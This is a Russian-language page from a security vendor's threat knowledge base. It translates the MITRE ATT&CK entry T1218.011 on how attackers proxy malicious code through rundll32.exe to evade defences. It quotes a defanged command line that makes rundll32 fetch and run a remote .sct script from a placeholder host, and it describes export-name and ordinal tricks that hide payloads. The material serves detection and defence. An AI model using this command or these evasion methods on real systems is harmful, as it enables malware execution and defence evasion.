Используем файлы cookies, чтобы учесть ваши предпочтения и улучшить работу на нашем сайте. Нажав на «Закрыть», вы соглашаетесь с использованием нами файлов cookies.
Узнать больше

Закрыть

Сетевая безопасность

Защита виртуальных сред

Защита конечных точек

Защита мобильных устройств

Создание и проверка ЭП

Управление безопасностью

T1218.011 - Rundll32

Примеры обнаружения с помощью продуктов "Кода Безопасности":

Техники:  T1218 , T1218.001 , T1218.002 , T1218.003 , T1218.004 , T1218.005 , T1218.007 , T1218.008 , T1218.009 , T1218.010 , T1218.011 , T1218.012 , T1218.013 , T1218.014 , T1218.015

Злоумышленники могут использовать rundll32.exe для прокси-исполнения вредоносного кода. Использование rundll32.exe, а не прямое выполнение (т. е. Shared Modules), позволяет избежать срабатывания средств безопасности, которые могут не отслеживать выполнение процесса rundll32.exe из-за разрешений или ложных срабатываний при обычных операциях. Rundll32.exe обычно ассоциируется с выполнением полезных нагрузок DLL (например: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe также может использоваться для выполнения файлов элементов Control Panel (.cpl) через недокументированные функции shell32.dll Control_RunDLL и Control_RunDLLAsUser. Двойной щелчок на файле .cpl также приводит к выполнению файла rundll32.exe.(Цитата: Trend Micro CPL) Например, ClickOnce может быть проксирован через Rundll32.exe.

Rundll32 также может использоваться для выполнения сценариев, таких как JavaScript. Для этого можно использовать синтаксис, подобный этому: rundll32.exe javascript:«\..\mshtml,RunHTMLApplication „;document.write();GetObject(“script:https[:]//www[.]example[.]com/malicious.sct»)" Такое поведение было замечено в таких вредоносных программах, как Poweliks. (Цит. по: Это путаница в командной строке системы безопасности)

Злоумышленники также могут пытаться скрыть вредоносный код от анализа, используя способ, которым rundll32.exe загружает имена функций DLL. В рамках поддержки совместимости Windows с различными наборами символов rundll32.exe сначала проверяет наличие функций, поддерживающих широкий/юникод, а затем ANSI-символы, прежде чем загрузить указанную функцию (например, если дать команду rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe сначала попытается выполнить ExampleFunctionW, а в противном случае ExampleFunctionA, прежде чем загрузить ExampleFunction). Поэтому злоумышленники могут скрывать вредоносный код, создавая несколько одинаковых имен экспортируемых функций и добавляя W и/или A к безобидным.(Цитата: Attackify Rundll32.exe Obscurity)(Цитата: Github NoRunDll) Функции DLL также могут экспортироваться и выполняться по порядковому номеру (например: rundll32.exe file.dll,#1).

Кроме того, злоумышленники могут использовать приемы Masquerading (например, изменение имен файлов DLL, расширений файлов или имен функций) для дальнейшего сокрытия выполнения вредоносной полезной нагрузки.(Цитата: rundll32.exe protection evasion)

https://attack.mitre.org/techniques/T1218/011

← Назад

Визуализация смежных техник для T1218.011

Отрасль:
 с подтехниками
Техника

Закрыть